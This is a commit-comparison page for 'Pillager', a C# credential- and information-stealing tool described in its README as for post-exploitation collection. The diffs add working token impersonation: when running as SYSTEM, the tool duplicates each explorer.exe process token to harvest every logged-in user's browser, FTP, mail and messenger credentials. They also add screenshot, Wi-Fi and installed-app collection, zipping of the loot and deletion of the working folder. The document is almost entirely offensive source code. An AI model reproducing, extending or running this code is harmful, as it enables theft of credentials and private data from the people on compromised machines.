Compare commits
2 Commits
01a23b98bf
...
136ca40c63
| Author | SHA1 | Date |
|---|---|---|
簞純
|
136ca40c63 | |
|
簞純
|
ec6e84d537 |
|
|
@ -1,4 +1,6 @@
|
|||
using System.IO;
|
||||
using System;
|
||||
using System.IO;
|
||||
using System.Management;
|
||||
|
||||
namespace Pillager.Helper
|
||||
{
|
||||
|
|
@ -39,5 +41,41 @@ namespace Pillager.Helper
|
|||
}
|
||||
}
|
||||
}
|
||||
|
||||
public static string GetProcessUserName(int pID)
|
||||
{
|
||||
string text1 = null;
|
||||
SelectQuery query1 = new SelectQuery("Select * from Win32_Process WHERE processID=" + pID);
|
||||
ManagementObjectSearcher searcher1 = new ManagementObjectSearcher(query1);
|
||||
try
|
||||
{
|
||||
foreach (ManagementObject disk in searcher1.Get())
|
||||
{
|
||||
ManagementBaseObject inPar = null;
|
||||
ManagementBaseObject outPar = null;
|
||||
inPar = disk.GetMethodParameters("GetOwner");
|
||||
outPar = disk.InvokeMethod("GetOwner", inPar, null);
|
||||
text1 = outPar["User"].ToString();
|
||||
break;
|
||||
}
|
||||
}
|
||||
catch
|
||||
{
|
||||
text1 = "SYSTEM";
|
||||
}
|
||||
return text1;
|
||||
}
|
||||
|
||||
public static bool ImpersonateProcessToken(int pid)
|
||||
{
|
||||
IntPtr hProcess = Native.OpenProcess(Native.PROCESS_ACCESS_FLAGS.PROCESS_QUERY_INFORMATION, true, pid);
|
||||
if (hProcess == IntPtr.Zero) return false;
|
||||
IntPtr hToken;
|
||||
if (!Native.OpenProcessToken(hProcess, 0x00000002 | 0x00000004, out hToken)) return false;
|
||||
IntPtr DuplicatedToken = new IntPtr();
|
||||
if (!Native.DuplicateToken(hToken, 2, ref DuplicatedToken)) return false;
|
||||
if (!Native.SetThreadToken(IntPtr.Zero, DuplicatedToken)) return false;
|
||||
return true;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
|
|
|||
|
|
@ -7,6 +7,15 @@ namespace Pillager.Helper
|
|||
{
|
||||
public static class Native
|
||||
{
|
||||
[DllImport("advapi32.dll", CharSet = CharSet.Auto, SetLastError = true)]
|
||||
public static extern bool RevertToSelf();
|
||||
[DllImport("advapi32.dll", SetLastError = true)]
|
||||
[return: MarshalAs(UnmanagedType.Bool)]
|
||||
public static extern bool OpenProcessToken(IntPtr ProcessHandle, UInt32 DesiredAccess, out IntPtr TokenHandle);
|
||||
[DllImport("advapi32.dll")]
|
||||
public extern static bool DuplicateToken(IntPtr ExistingTokenHandle, int SECURITY_IMPERSONATION_LEVEL, ref IntPtr DuplicateTokenHandle);
|
||||
[DllImport("advapi32.dll", SetLastError = true)]
|
||||
public static extern bool SetThreadToken(IntPtr pHandle, IntPtr hToken);
|
||||
[DllImport("kernel32", SetLastError = true)]
|
||||
[return: MarshalAs(UnmanagedType.Bool)]
|
||||
public static extern bool IsWow64Process(IntPtr hProcess, out bool wow64Process);
|
||||
|
|
|
|||
|
|
@ -35,6 +35,7 @@
|
|||
<ItemGroup>
|
||||
<Reference Include="System" />
|
||||
<Reference Include="System.Drawing" />
|
||||
<Reference Include="System.Management" />
|
||||
<Reference Include="System.Security" />
|
||||
<Reference Include="System.Data" />
|
||||
<Reference Include="System.Windows.Forms" />
|
||||
|
|
@ -77,8 +78,9 @@
|
|||
<Compile Include="Messengers\QQ.cs" />
|
||||
<Compile Include="Messengers\Skype.cs" />
|
||||
<Compile Include="Messengers\Telegram.cs" />
|
||||
<Compile Include="Others\ScreenShot.cs" />
|
||||
<Compile Include="Others\Wifi.cs" />
|
||||
<Compile Include="SystemInfos\InstalledApp.cs" />
|
||||
<Compile Include="SystemInfos\ScreenShot.cs" />
|
||||
<Compile Include="SystemInfos\Wifi.cs" />
|
||||
<Compile Include="Program.cs" />
|
||||
<Compile Include="Properties\AssemblyInfo.cs" />
|
||||
<Compile Include="Helper\SQLiteHandler.cs" />
|
||||
|
|
|
|||
|
|
@ -1,11 +1,13 @@
|
|||
using System.IO;
|
||||
using System;
|
||||
using System.Diagnostics;
|
||||
using System.IO;
|
||||
using Pillager.Browsers;
|
||||
using Pillager.FTPs;
|
||||
using Pillager.Helper;
|
||||
using Pillager.Mails;
|
||||
using Pillager.Messengers;
|
||||
using Pillager.Others;
|
||||
using Pillager.Softwares;
|
||||
using Pillager.SystemInfos;
|
||||
using Pillager.Tools;
|
||||
|
||||
namespace Pillager
|
||||
|
|
@ -20,16 +22,43 @@ namespace Pillager
|
|||
if (File.Exists(savezippath)) File.Delete(savezippath);
|
||||
Directory.CreateDirectory(savepath);
|
||||
|
||||
if (Environment.UserName.ToLower() == "system")
|
||||
{
|
||||
foreach (Process p in Process.GetProcesses())
|
||||
{
|
||||
if (p.ProcessName.ToLower() == "explorer" && Methods.ImpersonateProcessToken(p.Id))
|
||||
{
|
||||
string usersavepath = Path.Combine(savepath, Methods.GetProcessUserName(p.Id));
|
||||
Directory.CreateDirectory(usersavepath);
|
||||
SaveAll(usersavepath);
|
||||
Native.RevertToSelf();
|
||||
}
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
SaveAll(savepath);
|
||||
}
|
||||
|
||||
//Zip
|
||||
ZipStorer zip = ZipStorer.Create(savezippath);
|
||||
foreach (var item in Directory.GetDirectories(savepath))
|
||||
zip.AddDirectory(ZipStorer.Compression.Deflate, item, "");
|
||||
foreach (var item in Directory.GetFiles(savepath))
|
||||
zip.AddFile(ZipStorer.Compression.Deflate, item, Path.GetFileName(item));
|
||||
zip.Close();
|
||||
|
||||
Directory.Delete(savepath, true);
|
||||
}
|
||||
|
||||
static void SaveAll(string savepath)
|
||||
{
|
||||
//Browsers
|
||||
IE.Save(savepath);
|
||||
OldSogou.Save(savepath);//SogouExplorer < 12.x
|
||||
Chrome.Save(savepath);
|
||||
FireFox.Save(savepath);
|
||||
|
||||
//Others
|
||||
Wifi.Save(savepath);
|
||||
ScreenShot.Save(savepath);
|
||||
|
||||
//FTP
|
||||
WinSCP.Save(savepath);
|
||||
FileZilla.Save(savepath);
|
||||
|
|
@ -66,15 +95,10 @@ namespace Pillager
|
|||
Line.Save(savepath);
|
||||
Discord.Save(savepath);
|
||||
|
||||
//Zip
|
||||
ZipStorer zip = ZipStorer.Create(savezippath);
|
||||
foreach (var item in Directory.GetDirectories(savepath))
|
||||
zip.AddDirectory(ZipStorer.Compression.Deflate, item, "");
|
||||
foreach (var item in Directory.GetFiles(savepath))
|
||||
zip.AddFile(ZipStorer.Compression.Deflate, item, Path.GetFileName(item));
|
||||
zip.Close();
|
||||
|
||||
Directory.Delete(savepath, true);
|
||||
//SystemInfos
|
||||
Wifi.Save(savepath);
|
||||
ScreenShot.Save(savepath);
|
||||
InstalledApp.Save(savepath);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
|
|
|||
|
|
@ -0,0 +1,46 @@
|
|||
using Microsoft.Win32;
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.IO;
|
||||
using System.Linq;
|
||||
using System.Text;
|
||||
|
||||
namespace Pillager.SystemInfos
|
||||
{
|
||||
internal class InstalledApp
|
||||
{
|
||||
public static string SystemInfoName = "InstalledApp";
|
||||
|
||||
public static string GetInfo()
|
||||
{
|
||||
StringBuilder sb = new StringBuilder();
|
||||
try
|
||||
{
|
||||
using (RegistryKey key = Registry.LocalMachine.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Uninstall"))
|
||||
foreach (var subkey in key.GetSubKeyNames())
|
||||
{
|
||||
string value = key.OpenSubKey(subkey)?.GetValue("DisplayName", "Error").ToString();
|
||||
if (!string.IsNullOrEmpty(value) && value != "Error" && !value.Contains("Windows"))
|
||||
sb.AppendLine(value);
|
||||
}
|
||||
}
|
||||
catch
|
||||
{ }
|
||||
return sb.ToString();
|
||||
}
|
||||
public static void Save(string path)
|
||||
{
|
||||
try
|
||||
{
|
||||
string savepath = Path.Combine(path, SystemInfoName);
|
||||
string result = GetInfo();
|
||||
if (!string.IsNullOrEmpty(result))
|
||||
{
|
||||
Directory.CreateDirectory(savepath);
|
||||
File.WriteAllText(Path.Combine(savepath, SystemInfoName + ".txt"), result);
|
||||
}
|
||||
}
|
||||
catch { }
|
||||
}
|
||||
}
|
||||
}
|
||||
|
|
@ -4,17 +4,17 @@ using System.IO;
|
|||
using System.Windows.Forms;
|
||||
using Pillager.Helper;
|
||||
|
||||
namespace Pillager.Others
|
||||
namespace Pillager.SystemInfos
|
||||
{
|
||||
internal class ScreenShot
|
||||
{
|
||||
public static string OtherName = "ScreenShot";
|
||||
public static string SystemInfoName = "ScreenShot";
|
||||
|
||||
public static void Save(string path)
|
||||
{
|
||||
try
|
||||
{
|
||||
string savepath = Path.Combine(path, OtherName);
|
||||
string savepath = Path.Combine(path, SystemInfoName);
|
||||
try
|
||||
{
|
||||
Native.SetProcessDPIAware();
|
||||
|
|
@ -32,7 +32,7 @@ namespace Pillager.Others
|
|||
{
|
||||
graphics.CopyFromScreen(screen.Bounds.Left, screen.Bounds.Top, 0, 0, new Size(bitmap.Width, bitmap.Height), CopyPixelOperation.SourceCopy);
|
||||
}
|
||||
bitmap.Save(Path.Combine(savepath, OtherName + i + ".jpg"), ImageFormat.Jpeg);
|
||||
bitmap.Save(Path.Combine(savepath, SystemInfoName + i + ".jpg"), ImageFormat.Jpeg);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
|
@ -4,11 +4,11 @@ using System.Text;
|
|||
using System.Xml;
|
||||
using Pillager.Helper;
|
||||
|
||||
namespace Pillager.Others
|
||||
namespace Pillager.SystemInfos
|
||||
{
|
||||
internal class Wifi
|
||||
{
|
||||
public static string OtherName = "Wifi";
|
||||
public static string SystemInfoName = "Wifi";
|
||||
private static string GetMessage()
|
||||
{
|
||||
const int dwClientVersion = 2;
|
||||
|
|
@ -72,12 +72,12 @@ namespace Pillager.Others
|
|||
{
|
||||
try
|
||||
{
|
||||
string savepath = Path.Combine(path, OtherName);
|
||||
string savepath = Path.Combine(path, SystemInfoName);
|
||||
string wifi = GetMessage();
|
||||
if (!string.IsNullOrEmpty(wifi))
|
||||
{
|
||||
Directory.CreateDirectory(savepath);
|
||||
File.WriteAllText(Path.Combine(savepath, OtherName + ".txt"), wifi);
|
||||
File.WriteAllText(Path.Combine(savepath, SystemInfoName + ".txt"), wifi);
|
||||
}
|
||||
}
|
||||
catch { }
|
||||
|
|
@ -85,6 +85,7 @@ Will add more ......
|
|||
|
||||
* Wifi
|
||||
* ScreenShot
|
||||
* InstalledApp
|
||||
|
||||
## Usage
|
||||
|
||||
|
|
|
|||
|
|
@ -83,6 +83,7 @@ Pillager是一个适用于后渗透期间的信息收集工具,可以收集目
|
|||
|
||||
* Wifi
|
||||
* 截屏
|
||||
* 已安装应用
|
||||
|
||||
## 使用方法
|
||||
|
||||
|
|
|
|||
Loading…
Reference in New Issue